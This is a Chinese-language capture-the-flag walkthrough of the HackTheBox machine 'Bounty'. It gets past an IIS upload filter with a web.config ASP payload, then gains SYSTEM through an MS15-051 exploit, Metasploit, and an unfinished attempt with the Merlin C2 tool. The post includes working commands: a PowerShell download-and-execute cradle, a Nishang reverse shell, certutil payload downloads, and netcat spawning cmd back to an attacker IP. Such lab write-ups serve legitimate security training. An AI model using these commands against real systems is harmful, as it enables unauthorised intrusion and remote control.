**
HackTheBox-windows-Bounty-Walkthrough
**
靶机地址:https://www.hackthebox.eu/home/machines/profile/142
靶机难度:初级(3.7/10)
靶机发布日期:2018年11月2日
靶机描述:
Bounty is an easy to medium difficulty machine, which features an interesting technique to bypass file uploader protections and achieve code execution. This machine also highlights the importance of keeping systems updated with the latest security patches.
作者:大余
时间:2020-02-20
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的IP是10.10.10.93…
Microsoft IIS httpd 7.5…这版本一般存在缓冲区溢出漏洞…往下走看看…
查看前端源码没发现什么…
命令:gobuster -u http://10.10.10.93/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x aspx
Microsoft IIS httpd 7.5知道这是windows server 2008 R2系统,一般都存在aspx动态网页文件…发现了tranfer.aspx
正常访问,可以上传文件…
上传PHP没成功,尝试asxp文件也无法成功上传…显示文件无效…
经过尝试GIF格式文件是可以上传的…这边可以开始玩扩展程序了…
发送到Repeater分析…
继续测试发现config,继续分析…
现在我针对不同的文件扩展名进行检测…
经过对扩展名注入的攻击,发现了字节数1350-1355之间存在5个字节可利用…因为他们的状态都是200成功上传的…说明这里可以利用RCE进行攻击…GO
可以通过谷歌搜索rce攻击…
原文作者的代码是源代码,需要自己修改,我没这个能力,我去查看了Soroush的文章…链接
在图中可以看到相关于web.config利用在哪些版本,以及怎么绕过的简单原理…链接
想学习更多:https://github.com/wireghoul/htshells
继续…
copy到本地…
经过上传后,执行回复3…响应点是正确的,利用即可…GO
这里kali自带的简单的web.config绕过文本内容…
继续…
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c ping 10.10.14.16")
o = cmd.StdOut.Readall()
Response.write(o)
%>
利用简单的web.config注入代码,利用icmp反包测试成功…
二、提权
利用ps1反向shell提权即可…(谷歌很多ps1的shell脚本)
命令:curl -sk https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 > dayu.ps1
命令:echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 6666' >> dayu.ps1 —写入反向外壳
命令:cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.16/dayu.ps1') --修改web.config
成功通过80访问上传反向shell…获得低权用户…
可以看出版本,以及这是个未打补丁新的系统…
前面也遇到过很多,应该很多漏洞,我这里利用了ms15-051…
命令:certutil -urlcache -f http://10.10.14.5/ms15-051.exe dayu.exe
命令:./dayu.exe "c:\Users\merlin\Desktop\nc64.exe -e cmd 10.10.14.5 7777"
通过上传ms15-051.exe和nc,执行即可…
成功获得root.txt…
方法2:
利用MSF解析下…GO
这里利用生成一个反向shell.exe,通过certutil.exe上传到靶机,通过handler进行监听…
可以看到X64有两个漏洞可以利用…看看X86扫描也有很多漏洞可利用…
我这里就随便演示一个,成功获得system权限查看两个flag…
方法3:
利用Merlin代理进行渗透提权…为什么用它,因为此靶机页面是一张向导的老人图…使用HTTP/2.0进行渗透更有效…我也第一次学习,走起
Merlin是使用golang编写的跨平台的利用后HTTP / 2命令和控制服务器和代理…(Golang语言编写的…666)
地址:git clone https://github.com/Ne0nd0g/merlin
第一步就是下载Merlin…
由于Merlin是golang语言编译的,需要下载apt-get install golang才可以运行…
Merlin打开需要创建X509的SSL…
给自己创建了key,时间为7天…开始Merlin之旅…
可以看到运行go run命令,还需要更新源文件内容,等几分钟自动更新就好…
命令:go run main.go
运行后,根据提示已经通过X.509的密匙成功运行了…这边发现IP地址是本地的,需要修改成tun0里的地址…
命令:go run main.go -i 10.10.14.5
通过-i来修改本地IP…OK
命令:GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.10.14.5:443" -o dayu.exe main.go
这里需要利用main.go创建一个exe链接Mrelin…
前面是打错了几次命令,报错了…-X是HTTP/2.0专属的二进制传输…-o是输出文件…意思就是创建windows64位的二进制文件…
命令:certutil -urlcache -split -f http://10.10.14.5/dayu.exe C:\\users\\public\\dayu.exe
上传该文件…
好的,我从下午到晚上凌晨都卡在这而,按照思路是通过EXE以及server.crt在main.go上获得靶机的信息…注入可以看出,他在本地执行了merlin…按照回复的命令我应该要到靶机上./dayu.exe \10.10.14.5…此类命令…这方法我肯定不会去尝试,那不是直接得拿到权限才能使用的方法,那还有啥意思…我应该在前面SSL或者EXE生成的时候少了代码…能力有限啊…如果有大佬看到最后,希望给个解决方法,感激不尽,我放弃了…
我查看了Merlin作者的Twitter,没有此类的解决信息…这是一款黑客经常使用的渗透测试的软件,我是没找到网上有啥视频或者别的很仔细的教程…希望有的分享下,谢啦!!!
这台靶机还是很舒服的,我玩了burpsuit对靶机的各种注入,比较舒服,大家可以尝试玩玩…
由于我们已经成功得到root权限查看user.txt和root.txt,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
